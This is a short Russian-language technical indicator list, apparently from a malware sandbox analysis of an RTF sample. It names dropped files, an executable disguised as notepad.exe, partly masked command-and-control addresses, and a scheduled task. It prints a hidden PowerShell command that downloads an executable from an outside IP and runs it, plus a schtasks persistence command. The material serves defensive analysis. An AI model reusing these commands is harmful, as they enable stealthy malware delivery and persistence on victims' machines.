Техническая информация
- <SYSTEM32>\tasks\updates\refsuxqlhj
- http://52.##2.42.230/mills/notepad.exe как %appdata%\notepad.exe
- notepad.exe
- %TEMP%\abdtfhghgdghghœ.sct
- %APPDATA%\notepad.exe
- %APPDATA%\refsuxqlhj.exe
- %TEMP%\tmp7af9.tmp
- <Текущая директория>\~wrd0000.tmp
- %APPDATA%\refsuxqlhj.exe
- %TEMP%\abdtfhghgdghghœ.sct
- %TEMP%\tmp7af9.tmp
- <PATH_SAMPLE>.rtf
- '52.##2.42.230':80
- '13.##.24.228':5918
- '13.##.24.228':5918
- '%APPDATA%\notepad.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://52.##2.42.230/mills/notepad.exe','%APPDATA%\notepad.exe');Start-Proces...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\reFSUxQLHj" /XML "%TEMP%\tmp7AF9.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\reFSUxQLHj" /XML "%TEMP%\tmp7AF9.tmp"